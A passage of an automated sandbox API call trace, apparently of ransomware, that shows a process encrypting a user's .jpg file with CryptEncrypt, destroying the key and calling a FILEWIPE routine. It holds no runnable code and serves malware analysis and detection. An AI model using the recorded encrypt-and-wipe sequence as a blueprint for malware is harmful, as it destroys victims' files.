hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0041.260] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.260] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.260] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.260] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0041.261] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.261] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0041.261] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.261] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.261] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.261] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0041.261] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.261] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0041.261] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.262] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.262] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x14480, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x14490) returned 1 [0041.262] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.262] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0041.262] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.262] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.262] CharLowerBuffW (in: lpsz="byte[83089]", cchLength=0xb | out: lpsz="byte[83089]") returned 0xb [0041.262] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.264] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.264] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.264] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.266] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.266] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x95d918*, pdwDataLen=0x6ae220*=0x14480, dwBufLen=0x14490 | out: pbData=0x95d918*, pdwDataLen=0x6ae220*=0x14490) returned 1 [0041.267] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.267] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0041.267] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.270] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.270] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.270] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.270] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0041.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.270] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.270] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.270] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.270] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0041.270] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.270] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.270] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.271] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.271] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0041.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.278] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.278] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.278] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.283] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.283] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.284] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0041.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.284] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.284] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.284] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0041.284] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.285] CryptDestroyKey (hKey=0x7c2200) returned 1 [0041.285] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.285] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.285] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0041.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.285] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.285] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.285] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0041.285] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0041.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0041.285] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.285] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.285] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0041.285] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0041.285] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0041.286] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.286] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.286] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.286] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0041.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.286] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.286] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.286] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.286] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.286] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.286] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0041.286] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0041.286] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.286] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0041.286] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.287] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0041.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0041.287] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.287] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.287] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0041.287] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.287] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.287] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.287] FreeLibrary (hLibModule=0x754b0000) returned 1 [0041.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0041.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0041.287] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0041.287] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0041.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.287] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.287] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.288] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.288] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.288] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0041.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0041.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.289] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.289] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.289] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19a30a60, ftCreationTime.dwHighDateTime=0x1d5b5d3, ftLastAccessTime.dwLowDateTime=0x937c360, ftLastAccessTime.dwHighDateTime=0x1d5b686, ftLastWriteTime.dwLowDateTime=0x937c360, ftLastWriteTime.dwHighDateTime=0x1d5b686, nFileSizeHigh=0x0, nFileSizeLow=0x14480, dwReserved0=0x0, dwReserved1=0x777648, cFileName="zSK4r.jpg", cAlternateFileName="")) returned 0x7c2240 [0041.289] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0041.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0041.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.289] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.289] CharLowerBuffW (in: lpsz="byte[83072]", cchLength=0xb | out: lpsz="byte[83072]") returned 0xb [0041.290] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.290] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0041.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0041.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.290] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.290] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0041.290] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0041.290] FreeLibrary (hLibModule=0x76b40000) returned 1 [0041.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0041.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0041.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0041.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0041.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0041.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 